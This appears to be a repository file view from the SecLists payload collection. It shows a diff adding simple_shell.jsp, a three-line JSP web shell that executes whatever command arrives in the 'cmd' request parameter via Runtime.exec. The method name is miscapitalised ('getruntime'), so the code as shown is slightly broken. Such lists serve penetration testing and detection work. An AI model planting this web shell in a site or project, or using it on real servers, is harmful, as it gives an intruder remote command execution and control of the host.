SecLists/Payloads/simple_shell.jsp
2015-08-05 07:25:02 -07:00

4 lines
66 B
Plaintext

+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>